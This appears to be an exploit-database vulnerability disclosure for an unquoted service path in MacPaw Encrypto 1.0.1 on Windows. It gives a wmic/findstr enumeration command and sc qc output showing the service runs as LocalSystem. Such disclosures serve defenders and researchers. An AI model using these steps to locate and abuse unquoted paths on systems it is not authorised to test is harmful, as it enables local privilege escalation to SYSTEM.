MacPaw Encrypto version 1.0.1 suffers from an unquoted service path vulnerability.
b41061e268bd3c836ec3d4e613e65ba0
# Exploit Title: MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 03-19-2020
# Vendor Homepage: https://macpaw.com/encrypto
# Software Links : https://dl.devmate.com/com.macpaw.win.Encrypto/EncryptoforWin.exe?cid=78456412.1616181092
# Tested Version: 1.0.1
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
Encrypto Service Encrypto.Service C:\Program Files\Encrypto\Encrypto.Service.exe Auto
C:\>sc qc "Encrypto.Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Encrypto.Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START (DELAYED)
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Encrypto\Encrypto.Service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Encrypto Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem